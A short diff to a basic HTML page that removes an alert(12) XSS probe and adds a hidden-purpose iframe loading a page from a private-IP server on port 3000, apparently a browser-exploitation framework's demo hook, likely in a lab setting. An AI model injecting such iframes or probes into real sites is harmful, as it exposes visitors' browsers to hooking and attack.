--- a/index.html
+++ b/index.html
@@ -1,8 +1,7 @@
 <!DOCTYPE html>
 <html>
-  <script>alert(12)</script>
 <body>
-
+<iframe src="http://10.10.62.235:3000/demos/butcher/index.html"></iframe>
 <h1>My First Heading</h1>
 <p>My first paragraph.</p>
 
